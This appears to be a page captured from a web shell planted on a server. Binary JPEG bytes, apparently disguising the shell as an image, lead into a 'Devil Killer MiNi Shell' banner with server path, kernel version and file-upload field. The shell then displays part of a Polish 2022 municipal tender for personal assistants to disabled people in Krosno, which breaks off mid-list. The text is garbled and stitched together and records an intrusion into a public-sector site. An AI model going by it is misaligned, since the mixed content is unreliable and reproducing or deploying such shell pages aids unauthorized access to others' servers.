JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220707/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220707/0024308401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Postępowanie o udzielenie zamówienia publicznego na usługi społeczne w ramach Programu Ministra Rodziny i Polityki Społecznej pn. „Asystent osobisty osoby niepełnosprawnej&#34;- edycja 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY RODZINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370004853</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piastowska 58</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krosno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@moprkrosno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://moprkrosno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Postępowanie o udzielenie zamówienia publicznego na usługi społeczne w ramach Programu Ministra Rodziny i Polityki Społecznej pn. „Asystent osobisty osoby niepełnosprawnej&#34;- edycja 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fc6ee589-f918-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00243084</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008830/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi społeczne Asystent osobisty Osoby Niepełnosprawnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych – Dz.Urz. UE<br/>L 119/1 z 4.5.2016) informuję:<br/>1. Administratorem danych osobowych jest Miejski Ośrodek Pomocy Rodzinie w Krośnie ul. Piastowska 58, 38 – 400 Krosno, tel. 13 43 204 59 , zamowienia@moprkrosno.pl<br/>2. Kontakt z inspektorem ochrony danych osobowych – iod@moprkrosno.pl<br/>3. Pani/Pana dane osobowe, przetwarzane będą dla potrzeb realizacji Zamówienia na usługi społeczne w ramach Programu &#34;Asystent osobisty osoby niepełnosprawnej&#34; – edycja 2022, na podstawie (art. 6 ust. 1 lit. e Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r.) - realizacja zadań publicznych przez administratora lub sprawowanie władzy publicznej powierzonej administratorowi.<br/>4. Odbiorcami Pani/Pana danych osobowych będą podmioty upoważnione na podstawie przepisów prawa.<br/>5. Dane gromadzone w procesie realizacji Zamówienia na usługi społeczne w ramach Programu &#34;Asystent osobisty osoby niepełnosprawnej&#34; – edycja 2022, będą przechowywane przez okres wskazany w Rozporządzeniu Prezesa Rady Ministrów z dnia 18 stycznia 2011 roku w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych oraz Zarządzeniem Nr 22/2017 Dyrektora Miejskiego Ośrodka Pomocy Rodzinie w Krośnie<br/>z dnia 27 listopada 2017 roku zm zmianami w sprawie instrukcji kancelaryjnej, jednolitego rzeczowego wykazu akt oraz instrukcji w sprawie organizacji i zakresu działania składnicy akt.<br/>6. Osobie, której dane dotyczą przysługuje prawo do żądania dostępu do danych osobowych oraz ich sprostowania czy ograniczenia<br/>przetwarzania Prawo do usunięcia, ograniczenia przetwarzania, wniesienia sprzeciwu wobec przetwarzania, przenoszenia danych, cofnięcia zgody przysługuje w dowolnym momencie wobec danych przetwarzanych na podstawie wyrażonej zgody (pod warunkiem, że wykaże Pani/Pan jedną z podstaw prawnych wynikających z art. 18 ust. 1 a-d Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z 27 kwietnia 2016 r.) Cofnięcie zgody nie ma wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem<br/>7. Osobie, której dane dotyczą przysługuje prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych jeżeli uzna, że<br/>przetwarzanie danych osobowych jest niezgodne z przepisami Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>8. Podane przez Panią/Pana dane osobowe nie będą wykorzystane do zautomatyzowanego podejmowania decyzji, w tym profilowania, o którym mowa z art. 22 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.261.2.104.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 1<br/>Świadczenie usług w ramach programu „Asystent Osobisty Osoby Niepełnosprawnej” – edycja 2022 przez jednego asystenta osobistego osoby niepełnosprawnej dla trzech osób niepełnosprawnych. <br/>Cena ofertowa jednej godziny zegarowej wynagrodzenia z tytułu świadczenia usługi asystenta osobistego osoby niepełnosprawnej nie może przekroczyć 40 zł brutto. Wskazana powyżej cena stanowi wynagrodzenie całkowite Wykonawcy (wynagrodzenie brutto brutto) i uwzględnia wszystkie koszty i składki niezbędne do wykonania powyższego zamówienia przewidziane przepisami prawa, w tym składki na ubezpieczenie społeczne, składkę zdrowotną, składki na Fundusz Pracy, składki na fundusz wypadkowy podatek, wszelkie opłaty/wpłaty na PPK (wynikające z ustawy z dnia 4 października 2018 r. o pracowniczych planach kapitałowych), których obowiązek wynika z aktualnie obowiązujących przepisów zarówno przez Wykonawcę oraz Zamawiającego ( tj. płaca Wykonawcy brutto oraz narzuty na wynagrodzenie ze strony Zamawiającego).<br/>W ramach realizacji zadania nr 1 będą pokrywane również koszty związane bezpośrednio z realizacją usług asystenta, tj:. <br/>•	koszt zakupu biletów komunikacji publicznej/prywatnej jednorazowych lub miesięcznych dla asystenta nie więcej niż 30 zł brutto miesięcznie na asystenta.<br/>•	koszt ubezpieczeń OC lub NNW asystenta związanych ze świadczeniem usługi asystenta nie więcej niż 150 zł jednorazowo na asystenta.<br/>•	koszt zakupu biletów wstępu na wydarzenia kulturalne/rozrywkowe/sportowe/społeczne itp. dla asystenta towarzyszącego uczestnikowi Programu nie więcej niż 25 zł brutto miesięcznie na asystenta.<br/>Usługi asystenta świadczone będą na rzecz osób niepełnosprawnych posiadających orzeczenie o znacznym lub umiarkowanym stopniu niepełnosprawności, zgodnie z ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych albo orzeczenie równoważne do wyżej wymienionego, które wymagają usługi asystenta w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym, uczestników programu „Asystent osobisty osoby niepełnosprawnej” edycja 2022, mieszkańców Gminy Miasta Krosna, zwanych dalej także „uczestnikiem Programu/uczestnikami Programu”.<br/>Usługi asystenta w szczególności mogą polegać na pomocy asystenta w: <br/>1.	wykonywaniu czynności dnia codziennego dla uczestnika Programu;<br/>2.	wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsca;<br/>3.	załatwianiu spraw urzędowych;<br/>4.	korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy);<br/>5.	zaprowadzaniu dzieci z orzeczeniem o niepełnosprawności do placówki oświatowej lub przyprowadzaniu ich z niej; <br/>6.	wsparcie w czynnościach samoobsługowych, w tym utrzymaniu higieny osobistej i czynnościach pielęgnacyjnych:<br/>a)	myciu głowy, myciu ciała, kąpieli ;<br/>b)	czesaniu;<br/>c)	goleniu;<br/>d)	obcinaniu paznokci rąk i nóg;<br/>e)	zmianie pozycji, np. przesiadaniu się z łóżka/krzesła na wózek, ułożeniu się w łóżku;<br/>f)	zapobieganiu powstaniu odleżyn lub odparzeń;<br/>g)	przygotowaniu i spożywaniu posiłków i napojów;<br/>h)	słaniu łóżka i zmianie pościeli;<br/>7.	wsparcie w prowadzeniu gospodarstwa domowego i wypełnianiu ról społecznych (w przypadku samodzielnego zamieszkiwania): <br/>a)	sprzątaniu mieszkania, w tym urządzeń codziennego użytku i sanitarnych oraz wynoszeniu śmieci;<br/>b)	dokonywaniu bieżących zakupów (towarzyszenie osoby niepełnosprawnej w sklepie – np. informowanie jej o lokalizacji towarów na półkach, podawanie towarów z półek, wkładanie towarów do koszyka/wózka sklepowego, niesienie koszyka (maksymalnie do 5 kg), prowadzenie wózka osoby niepełnosprawnej lub wózka sklepowego, pomoc przy kasie);<br/>c)	myciu okien;<br/>d)	utrzymywaniu w czystości i sprawności sprzętu ułatwiającego codzienne funkcjonowanie (np. wózek, balkonik, podnośnik, kule, elektryczna szczoteczka do zębów, elektryczna golarka, etc.);<br/>e)	praniu i prasowaniu odzieży i pościeli, ewentualnie ich oddawanie i odbiór z pralni (w obecności osoby niepełnosprawnej);<br/>f)	podaniu dziecka do karmienia, podniesieniu, przeniesieniu lub przewinięciu go;<br/>g)	transporcie dziecka osoby niepełnosprawnej np. odebraniu ze żłobka, przedszkola, szkoły (wyłącznie w obecności osoby niepełnosprawnej);<br/>8.	wsparcie w przemieszczaniu się poza miejscem zamieszkania: <br/>a)	pchanie wózka osoby niepełnosprawnej;<br/>b)	pomoc w pokonywaniu barier architektonicznych (np. schody, krawężniki, otwieranie drzwi);<br/>c)	pomoc w orientacji przestrzennej osobom niewidomym i słabowidzącym;<br/>d)	pomoc we wsiadaniu do i wysiadaniu z: tramwaju, autobusu, samochodu, pociągu;<br/>e)	asystowanie podczas podróży środkami komunikacji publicznej, w tym służącymi do transportu osób niepełnosprawnych oraz taksówkami;<br/>f)	transport uczestnika Programu samochodem osoby niepełnosprawnej lub asystenta;<br/>9.	wsparcie w podejmowaniu aktywności życiowej i komunikowaniu się z otoczeniem: <br/>a)	wyjście na spacer;<br/>b)	asystowanie podczas obecności osoby niepełnosprawnej w: kinie, teatrze, muzeum, restauracji, miejscu kultu religijnego, kawiarni, wydarzeniu plenerowym, etc.;<br/>c)	wsparcie w załatwianiu spraw urzędowych i związanych z poszukiwaniem pracy (np. rozmowie z urzędnikiem w wypadku trudności z werbalnym komunikowaniem się, wypełnianiu formularzy);<br/>d)	wsparcie w rozmowie z otoczeniem w wypadku trudności z werbalnym komunikowaniem się;<br/>e)	notowanie dyktowanych przez klienta treści ręcznie i na komputerze;<br/>f)	pomoc w zmianie ubioru i pozycji podczas: wizyt lekarskich, zabiegów rehabilitacyjnych, ćwiczeń fizjoterapeutycznych, pobytu na pływalni;<br/>g)	wsparcie w załatwianiu spraw w punktach usługowych (w obecności osoby niepełnosprawnej).<br/>W podejmowanych działaniach asystent ma obowiązek brania pod uwagę potrzeby <br/>i preferencje uczestnika Programu lub opiekuna prawnego. Zadaniem asystenta nie jest podejmowanie decyzji za osobę niepełnosprawną, a jedynie pomaganie bądź wspieranie jej w realizacji osobistych zamiarów. Asystent realizuje usługi na rzecz osoby niepełnosprawnej i w skutek jej decyzji lub decyzji opiekuna prawnego, a nie dla poszczególnych członków rodzin osoby niepełnosprawnej. W godzinach realizacji usług asystencji osobistej nie mogą być świadczone usługi opiekuńcze lub specjalistyczne usługi opiekuńcze, o których mowa w ustawie z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2020 r. poz. 1876, z późn. zm.), inne usługi finansowane w ramach Funduszu lub usługi obejmujące analogiczne wsparcie, o którym mowa w ust. 9, finansowane z innych źródeł. Usługa asystencji osobistej na terenie szkoły może być realizowana wyłącznie w przypadku, gdy szkoła nie zapewnia tej usługi.<br/>Czas trwania usług asystenta:<br/>a) usługi asystenta mogą być realizowane przez 24 godziny na dobę , 7 dni w tygodniu, z zastrzeżeniem stosowania w tym zakresie przepisów i norm, o których mowa w Kodeksie pracy, max. liczba 180 godzin na miesiąc (3 osoby po 60 godzin),<br/>b) limit godzin usług asystenta przypadających na 1 uczestnika Programu wynosi nie więcej niż 60 godzin miesięcznie,<br/>c) do czasu realizacji usług asystencji osobistej wlicza się czas oczekiwania/gotowości na świadczenie usług nie dłuższy niż 90 min. Jeżeli czas oczekiwania wynosi więcej niż 90 min., wówczas usługę dojazdu do wybranego miejsca i powrotu z niego rozlicza się jako dwie odrębne usługi powiększone łącznie o 90 min. trwania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie w oparciu o następujące kryteria i ich znaczenie:<br/><br/>1	Cena - 60 punktów <br/>2	Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym - 37 punktów <br/>3	Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy) - 3 punkty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym (na podstawie np. umowy o pracę, umowy o wolontariat, zaświadczenia lekarskiego, oświadczenia w przypadku opiekuna faktycznego), w tym zawodowe, wolontariackie lub osobiste, wynikające z pełnienia roli opiekuna faktycznego Do 6 miesięcy - 0 punktów powyżej 6 miesięcy do 12 miesięcy - 12 punktów powyżej 12 miesięcy do 18 miesięcy - 18 punktów powyżej 18 miesięcy do 24 miesięcy - 24 punktów powyżej 24 miesięcy do 30 miesięcy - 30 punktów powyżej 30 miesięcy - 37 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">37</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy): a)	wykształcenie w zakresie: pedagogika specjalna, terapia zajęciowa lub praca socjalna; tak- 1 punkt, nie - 0 punktów b)	ukończone szkolenia/kursy z zakresu wsparcia osób z niepełnosprawnością i/lub niesamodzielnych, opiekun osoby niepełnosprawnej tak - 1 punkt, nie - 0 punktów; c)	kurs pierwszej pomocy przedmedycznej tak - 1 punkt, nie - 0 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 2<br/>Świadczenie usług w ramach programu „Asystent Osobisty Osoby Niepełnosprawnej” – edycja 2022 przez jednego asystenta osobistego osoby niepełnosprawnej dla dwóch osób niepełnosprawnych. <br/>Cena ofertowa jednej godziny zegarowej wynagrodzenia z tytułu świadczenia usługi asystenta osobistego osoby niepełnosprawnej nie może przekroczyć 40 zł brutto. Wskazana powyżej cena stanowi wynagrodzenie całkowite Wykonawcy (wynagrodzenie brutto brutto) i uwzględnia wszystkie koszty i składki niezbędne do wykonania powyższego zamówienia przewidziane przepisami prawa, w tym składki na ubezpieczenie społeczne, składkę zdrowotną, składki na Fundusz Pracy, składki na fundusz wypadkowy podatek, wszelkie opłaty/wpłaty na PPK (wynikające z ustawy z dnia 4 października 2018 r. o pracowniczych planach kapitałowych), których obowiązek wynika z aktualnie obowiązujących przepisów zarówno przez Wykonawcę oraz Zamawiającego ( tj. płaca Wykonawcy brutto oraz narzuty na wynagrodzenie ze strony Zamawiającego).<br/>W ramach realizacji zadania nr 2 będą pokrywane również koszty związane bezpośrednio z realizacją usług asystenta, tj:. <br/>•	koszt zakupu biletów komunikacji publicznej/prywatnej jednorazowych lub miesięcznych dla asystenta nie więcej niż 30 zł brutto miesięcznie na asystenta.<br/>•	koszt ubezpieczeń OC lub NNW asystenta związanych ze świadczeniem usługi asystenta nie więcej niż 150 zł jednorazowo na asystenta.<br/>•	koszt zakupu biletów wstępu na wydarzenia kulturalne/rozrywkowe/sportowe/społeczne itp. dla asystenta towarzyszącego uczestnikowi Programu nie więcej niż 25 zł brutto miesięcznie na asystenta.<br/>Usługi asystenta świadczone będą na rzecz osób niepełnosprawnych posiadających orzeczenie o znacznym lub umiarkowanym stopniu niepełnosprawności, zgodnie z ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych albo orzeczenie równoważne do wyżej wymienionego, które wymagają usługi asystenta w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym, uczestników programu „Asystent osobisty osoby niepełnosprawnej” edycja 2022, mieszkańców Gminy Miasta Krosna, zwanych dalej także „uczestnikiem Programu/uczestnikami Programu”.<br/>Usługi asystenta w szczególności mogą polegać na pomocy asystenta w: <br/>1.	wykonywaniu czynności dnia codziennego dla uczestnika Programu;<br/>2.	wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsca;<br/>3.	załatwianiu spraw urzędowych;<br/>4.	korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy);<br/>5.	zaprowadzaniu dzieci z orzeczeniem o niepełnosprawności do placówki oświatowej lub przyprowadzaniu ich z niej.<br/>6.	wsparcie w czynnościach samoobsługowych, w tym utrzymaniu higieny osobistej i czynnościach 